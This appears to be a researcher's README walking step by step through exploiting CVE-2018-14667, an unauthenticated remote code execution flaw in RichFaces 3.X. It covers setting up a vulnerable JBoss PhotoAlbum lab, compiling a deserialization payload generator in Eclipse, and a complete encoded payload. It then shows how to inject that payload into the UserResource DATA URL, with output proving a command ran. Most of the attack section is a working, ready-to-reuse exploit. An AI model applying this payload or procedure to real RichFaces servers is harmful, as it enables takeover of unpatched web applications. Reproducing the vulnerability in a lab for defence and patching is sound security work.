After spending many time to understand and correctly exploit this CVE, I decided to build a repo on the RichFaces 3.X RCE bug and share the HOWTOs step by step with the community.

0x00 : Introduction on RichFaces 3.X bug

On Monday, November 19, Joao F M Figueiredo published a well detailed article (https://seclists.org/fulldisclosure/2018/Nov/47) on a critical high-risk RichFaces vulnerability.
CVSS3 Base Score 9.8

This vulnerability will allow any unauthenticated users to perform remote code execution on any web application using RichFaces 3.X (all version) which is pretty much the worst case scenario.

0x01 : Am I affected? 

Well, if you are running RichFaces 3.X (any version of RichFaces 3) and you see the following code in your source, chances are that yes, you might be vulnerable to remote code execution on CVE-2018-14667:

• org.ajax4jsf.resource.InternetResource
• org.ajax4jsf.resource.SerializableResource
• javax.el.Expression
• javax.faces.el.MethodBinding
• javax.faces.component,StateHolderSaver
• java.awt.Color

0x02 : Running a vulnerable environment to test the bug 

I will basically re-explain what has been already covered in the article of seclists.org on how to deploy a vulnerable environment.

1. Download JBoss 5.1.0GA and a demo application with RichFaces which contains the PhotoAlbum application.
   → http://downloads.jboss.org/richfaces/releases/3.3.X/3.3.4.Final/richfaces-examples-3.3.4.Final.zip
   → https://sourceforge.net/projects/jboss/files/JBoss/JBoss-5.1.0.GA/
2. Unzip the ZIP archive.
3. Copy the application richfaces-examples-3.3.4.Final/photoalbum/dist/photoalbum-ear-3.3.4.Final.ear to the JBoss deploy directory jboss-5.1.0.GA/server/default/deploy/
4. Start the JBoss application server using the following syntax (make sure before launching that your port 8080 is not already in use): cd bin ; ./run.sh -b 0.0.0.0
5. You'll need to browse on the PhotoAlbum Index page in order to activate the web application.

0x03 : Generating a valid payload 

Now the fun part! This is where I've experienced difficulties so I will explain in details how to generate a valid payload and without repeating the same errors I did. I would suggest first to use Eclipse for compiling the payload.

1. Download Eclipse on the following link:
   → https://www.eclipse.org/downloads/
2. Launch Eclipse and choose to create a new Web Project.
3. Get the payload generator (credits goes to orich1 from https://xz.aliyun.com/t/3264) available in this repo
   → https://raw.githubusercontent.com/syriusbughunt/CVE-2018-14667/master/Main.java
4. Extract the WAR archive in this repo (richfaces-demo-3.3.0.GA-tomcat6.war), copy all .jar files from WEB-INF/lib/ folder to WebContent/WEB-INF/lib/ in your Java Web Project in Eclipse
   → https://github.com/syriusbughunt/CVE-2018-14667/blob/master/richfaces-demo-3.3.0.GA-tomcat6.war
5. Add the Main.java file in Eclipse; right-click on your Java Web Project name in Eclipse, New, File.
6. Make the WebContent/WEB-INF/lib folder as the Build Path source in Eclipse; right-click on the lib folder, Build Path, Use as Source Folder.
7. Let's see if you can get lucky; click on the green Play button to run the compiler. If you get 0 errors and a valid payload in your output, congratulations, you now have a valid payload for CVE-2018-14667. Now, if you are having all kind of errors, don't panic. You might want to comment the following lines: 29,30,31,32,33,34,35 to look like this:

        // Class clazz = Class.forName("javax.el.MethodExpression");
        // Field field = clazz.getField("serialVersionUID");
        // field.setAccessible(true);
        // Field modifiersField = Field.class.getDeclaredField("modifiers");
        // modifiersField.setAccessible(true);
        // modifiersField.setInt(field, field.getModifiers() & ~Modifier.FINAL);
        // field.setLong(null, MethodExpressionSerialVersionUID);

Your output result in Eclipse should look like the following:

/DATA/eAHNVU1rE0EYnkarbf2qtqhVhLiKTUVmW6mHWgOFKiqkFpq2fvQgk82bZOJ-dWY2WSwVRUSwIkjxpiJ4bS!6B!ToJ9Jf4EEREUEE8SbOzKaJDeqhp-xpZvfZ533med59d-ErauYMHfRYHpMiCfuLPIcZcC9gFuAJDmysstk!wehxIghSV8eRLzG0NoU2WQyIgGHPFeAKgbaliqRETJu4eXM0UwRLDKbQegh9Kjmn0RXUlEItjpelOQrZyr65ROwA9Cb0pZYDiiLEOWIBx5bn-J4ruXFayEKnPDsLLE1KwM6!fJqcv!9mJIZiKdRq2YTzM8SBlRrSglE3LzW0cflOVnMItD1SST0zDYwSm14mGRsGQ1-V75YlMQ9cLcAGwTHYeJzkR0AUvOyJ0Jcn4dRztQ8INW1EKGSoKxItofW4J-bLuQ8!--!ENK6jiqsxPb5xK!39wtIxhVAKBlQYjFqFyIKAYuL7NrWIkGUjH-qLnGUSAgwn7l07ujD2UXvSmSEcohBqtQTapQ8fmmCbk8r42jNp0zqfMB3k7hqqvtZgqLJqkULjSmgx43HtUR3bace3BxZn287Ni-7Io53Vs9dBy21Xp94!-3VXGaC4W8uP0PV9MwymA-AC50EMq3gTPdVlyiOyD-QNWy6ih4Zix6rz8FjgCuqAofGR!IQhWWr3qVvyLkHCDWy7B0MIVsIQXmAV4qZwfJOoy-iZ!U-qvh9KA!auMKDeKOVA5tuOHxuebx1RDmjbyjcb42goYKhjSqccmVb5VBaXJj993jNzUjej7PGYQJ3aWerh0UD4gZBAII5A7TXDoy6TnpSX0Duz2rqmA1lKordMCIn0A7hZ9CGf1mscFoRjx4d6D!XGh!r6Dvf1J40VAyXZAE1ghHpwrdGj6R-zoa6f!xwNKvR2zbCl!ADNNcCB4hCNY7RZBxgIamM52EHF9xa9Xl18BTleL-YCN2lU2BsrOpVCVyWFh-h2I6Sw!Bf8Wwyv0IvVxVAMuEgay9SNkYFALao7xuUo!w0w9PXD.jsf

0x04 : Sending your payload and get Remote Code Execution 

Navigate in your browser to your local JBoss server running PhotoAlbum Web Application http://192.168.100.2:8080/photoalbum and right-click to view page source. Hit Ctrl+F and search for '/DATA/'. You should find something similar to this:

src="/photoalbum/a4j/s/3_3_3.Finalorg.ajax4jsf.resource.UserResource/n/n/DATA/eAF1Uk1rFEEQrQwGEz9AXVFyCMQoCiI9JCZeYkBQ0cCsQccI6ql2pna2h57ptrtndzDozYuCF6!evOpFf4HXgJf8BkFEBBHEq929QUnAvlXx6r1Xr!rtd5g0Gs5LXTAssV0qTZ9pMrLRGbENQ!rOTnFmQ!NraBH86yx!i2BfAoczTWjpqqwt1dbCsaTEIcYC6yJe75WU2ZUE9lOruON8BE9hIoGpSua8zynfqSeHKBoKRaucl7OeomV9zMiwTFZK1o6bpdYJ3ZQiJ53ikPT9rQ-rr15!6kYQJTCdCTTmFla020NqNa8L5-GAcTN54LBwYuySyzglzVHwx9gTtNIqL3!OSTLT1MGAIGsYCXYXiy7Zgcyvt8ptYrisQw4AE4cAWg0zY9MOuhf3Pt568fn30sso4Dp!cf-Y3jx7nv58sH3ZI7yDU!4YZU-aIL2Xb61Sovfj5K-DH492vbYPbmo0CzOnN3mFBSUSXURMIa!tmm88AWg0dB6GpZk!jcsyxPJu-96Xr7ObN4Kw2yeycNz7Y1yy9caqxjogYWXhSGiH2fFZlWpHKdyOeZ2JJicTB-3YCO6KgRyxdmArMXfl4sKFhcVLc7u-yer8f63OuxuoP9Xj4!8_" style="opacity: 0.1" class="main-image"><span class="rich-tool-tip tooltip" 

You can clearly see the serialized object. This is where we will replace the serialized object by our payload to get remote code execution. In your browser, change the URL to http://192.168.100.2:8080/photoalbum/a4j/s/3_3_3.Finalorg.ajax4jsf.resource.UserResource/n/n/DATA/YOUR-PAYLOAD-GENERATED-IN-ECLIPSE. My payload was executing the following command 'touch /tmp/PoorRichFaces'. Let's see if I had success:

drwxrwxrwt 12 root   root    32768 Nov 30 01:45 .
drwxr-xr-x 25 root   root     4096 Nov 25 12:57 ..
-rw-rw-r--  1 syrius syrius      0 Nov 30 1:27 PoorRichFaces 

Feels good, isn't it? We just got RCE on a Java Web Application running RichFaces 3.X.

0x05 : How to patch ? 

You might not like this fact so be ready and hang on to your keyboard; RichFaces has reached the end of life concerning the support of their product so users (you) should apply their own patch. Don't panic, if you can't find a way to patch, don't hesitate to contact me, we can make an arrangement so I could patch your Java Web Applications.

E-mail: [email protected]